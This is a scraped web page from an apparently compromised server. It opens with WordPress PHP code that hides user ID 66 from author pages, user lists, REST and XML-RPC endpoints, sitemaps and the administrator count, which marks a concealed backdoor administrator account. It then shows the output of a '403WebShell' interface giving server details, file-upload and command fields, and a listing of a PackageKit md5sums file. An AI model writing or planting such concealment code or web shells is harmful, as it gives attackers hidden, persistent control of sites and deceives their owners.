add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/packagekit.md5sums
493a6d9c1a2948ed57b452495bba3295  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_apt.so
fa9e561d0cf1a626e85f642609a48a9e  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_test_fail.so
a6db6a19e0b23e10d4201a078bf5bc4c  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_test_nop.so
f2892837d1f5f2aa07b42f711a82bba2  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_test_spawn.so
cd174eae2b65d23ab2f932e79e746b7c  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_test_succeed.so
94c88afc3a52593d4c3eb997f16bf904  usr/lib/aarch64-linux-gnu/packagekit-backend/libpk_backend_test_thread.so
e0f58f8ed3d86cc92f1ff873d0bee0fc  usr/lib/systemd/system/packagekit-offline-update.service
d500bc7c324a50ded35cdb9532cd82fe  usr/lib/systemd/system/packagekit.service
aeab3847a48394a211e925ebcd9f0a10  usr/lib/systemd/user/pk-debconf-helper.service
6695e01560942108a72ae570febdf2b0  usr/lib/systemd/user/pk-debconf-helper.socket
a48b97930ab87c54b88276b4c68f94ca  usr/libexec/packagekit-direct
2ab1c52580f48447e66ea92b9e94c120  usr/libexec/packagekitd
a1763d3298cf42a96fe46bf414e69a98  usr/libexec/pk-debconf-helper
9a5873c3890d5f59c0c479652401bf0b  usr/libexec/pk-offline-update
3431fbfcd2478d62fdd2f240c366f7ef  usr/share/PackageKit/helpers/apt/pkconffile.nodiff
26826e6e0cd74c77c5d6354a68efea9d  usr/share/PackageKit/helpers/test_spawn/search-name.sh
f2ba7b3aa9103f34cb1060d29bef0b65  usr/share/dbus-1/interfaces/org.freedesktop.PackageKit.Transaction.xml
89c0c28d22a5d28fc4507554e4e5fac9  usr/share/dbus-1/interfaces/org.freedesktop.PackageKit.xml
2a0734c5a4bed1412c5f0a2a4030ce67  usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service
fded44ee0c8edb7e65b9649570db3574  usr/share/dbus-1/system.d/org.freedesktop.PackageKit.conf
f5738f7259107076ed0b86c153979f8d  usr/share/doc/packagekit/NEWS.gz
9816216ea94aa49333ca074b24117f68  usr/share/doc/packagekit/README.Debian
856cbff648ecf675c9651bd7de7e0fc9  usr/share/doc/packagekit/copyright
c631dbfe794bb325931c9931e5ec6ba6  usr/share/lintian/overrides/packagekit
f71c7d389c1ecd8ca212baa0322cb462  usr/share/metainfo/org.freedesktop.packagekit.metainfo.xml
1bb39cd398ba67fe57721e9c529f4089  usr/share/polkit-1/actions/org.freedesktop.packagekit.policy
e799c608d56a378c9a200b0067e5535d  usr/share/polkit-1/rules.d/org.freedesktop.packagekit.rules
7c052ed56e84d65ce7fa4618c41fb28b  var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla

Youez - 2016 - github.com/yon3zu
LinuXploit